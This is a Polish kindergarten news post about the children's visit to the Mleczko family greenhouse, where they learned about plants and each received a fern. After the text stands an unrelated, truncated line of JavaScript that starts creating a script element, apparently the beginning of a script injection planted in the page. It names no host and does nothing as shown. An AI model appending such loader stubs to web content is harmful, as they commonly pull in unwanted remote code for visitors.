Z wizytą w cieplarni.

W poniedziałek 12 marca nasze przedszkolaki  odwiedziły gospodarstwo ogrodnicze Państwa Elżbiety i Marka Mleczków. Sam dojazd do cieplarni był nie lada atrakcją, bowiem dzieci miały okazje do przejażdżki autobusem .Ma miejscu powitała nas właścicielka gospodarstwa, pani Ela oraz jej teść pan Antoni Mleczko. Pan Antoni w  bardzo interesujący sposób opowiadał   o rozwoju roślin, warunkach niezbędnych do  ich wzrostu , sposobie wysiewu i wysadzania. Spacerując cieplarnianymi alejami dzieci poznawały trudne, łacińskie nazwy kwiatów,podziwiały ich kształty, ubarwienie oraz przeznaczenie. Dowiedziały się , że rośliny doniczkowe uprawia się nie tylko dla ozdoby.Są one jonizatorami powietrza, mogą być wykorzystywane jako lekarstwo ale mogą również posiadać właściwości trujące.Przedszkolaki z wielkim zaangażowaniem uczestniczyły w tej wyjątkowej lekcji przyrody, zadawały mnóstwo pytań,sam pan Mleczko z wielką cierpliwością udzielał na nie odpowiedzi. Na pamiątkę pobytu w cieplarni każde dziecko otrzymało paprotkę oraz szczegółowy instruktarz dotyczący jej uprawy. Mali ogrodnicy złożyli obietnice otoczenia roślinki opieką     i zobowiązali się , że za rok , gdy znów przyjadą do ogrodnika podzielą się z Panem Mleczkiem doświadczeniami  związanymi   z hodowlą paproci.

Gorąco dziękujemy  Państwu Mleczkom , za okazywaną przez lata życzliwość i stworzenie możliwości do corocznego zwiedzania ich gospodarstw. Przez szereg lat odwiedzaliśmy cieplarnie Państwa Elżbiety i Antoniego Mleczków, w tym roku zobaczyliśmy gospodarstwo Pani Elżbiety i Pana Marka. Przez szereg ostatnich lat nasze przedszkole zdobią rośliny sprezentowane przez  Państwa Mleczków, zaś Pani Małgosia Płaza niczym lekarz czuwa nad ich dobrą kondycją.

 

var d=document;var s=d.createElement(‚script’);